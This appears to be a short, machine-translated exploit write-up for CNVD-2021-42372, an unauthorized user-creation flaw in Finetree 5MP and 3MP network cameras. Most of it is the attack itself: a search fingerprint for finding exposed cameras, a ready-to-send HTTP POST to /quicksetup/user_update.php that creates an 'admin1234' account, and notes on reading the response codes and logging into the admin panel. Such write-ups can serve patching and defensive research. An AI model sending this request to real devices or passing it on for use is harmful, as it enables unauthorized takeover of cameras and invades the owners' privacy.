Finetree 5mp Camera User_pop Php Vulnerability Added To Any User Cnvd 2021 42372
Finetree 5mp Camera User_pop Php Vulnerability Added To Any User Cnvd 2021 42372
Finetree 5MP camera user_pop.php Add vulnerability to any user CNVD-2021-42372
Vulnerability Description
Finetree 5MP camera The user_pop.php file has unauthorized addition to any user. After the attacker adds it, he can obtain background permissions.
Vulnerability Impact
Finetree 5MP
Finetree 3MP
Network surveying and mapping
app=”Finetree-5MP-Network-Camera”
Vulnerability reappears
Login page
File with vulnerability user_pop.php
1
2
3
4
5
6
7
8
9
10
11
POST /quicksetup/user_update.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fn4qnpv5c8a2jgvf53vs1gufm6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
method=add&user=admin1234&pwd=admin1234&group=2&ptz_enable=0
Returning 200 means the addition is successful, return 804 means the user will repeat. Use the added account to log in to the background.
This post is licensed under CC BY 4.0 by the author.